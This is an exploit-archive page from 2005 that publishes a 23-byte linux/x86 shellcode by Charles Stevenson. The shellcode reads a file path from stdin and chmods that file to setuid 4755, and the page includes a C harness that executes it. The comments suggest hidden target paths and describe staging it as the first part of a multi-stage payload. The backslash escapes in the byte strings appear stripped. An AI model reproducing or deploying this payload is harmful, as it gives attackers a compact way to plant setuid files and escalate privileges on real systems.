[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 read(0,buf,2541); chmod(buf,4755); 23 bytes
# Published : 2005-11-09
# Author : Charles Stevenson
# Previous Title : HPUX execve /bin/sh 58 bytes
# Next Title : linux/x86 write(0,"Hello core!n",12); (w/optional 7 byte exit) 36 bytes
/* readnchmod-core.c by Charles Stevenson <core@bokeoa.com>
*
* Example of strace output if you pass in "/bin/shx00"
* read(0, "/bin/sh ", 2541) = 8
* chmod("/bin/sh", 04755) = 0
*
* Any file path can be given. For example: /tmp/.sneakyguy
* The only caveat is that the string must be NULL terminated.
* This shouldn't be a problem. For multi-stage payloads send
* in this first and then you can send it data with null bytes.
* I made this for rare cases with tight space contraints and
* where read() jmp *%esp is not practical.
*
*/
char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */
"x31xdb"// xor %ebx,%ebx
"xf7xe3"// mul %ebx
"x53"// push %ebx
"xb6x09"// mov $0x9,%dh
"xb2xed"// mov $0xed,%dl
"x89xe1"// mov %esp,%ecx
"xb0x03"// mov $0x3,%al
"xcdx80"// int $0x80
"x89xd1"// mov %edx,%ecx
"x89xe3"// mov %esp,%ebx
"xb0x0f"// mov $0xf,%al
"xcdx80"// int $0x80
;
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by coren",
strlen(hellcode));
shell();
return 0;
}
// www.Syue.com [2005-11-09]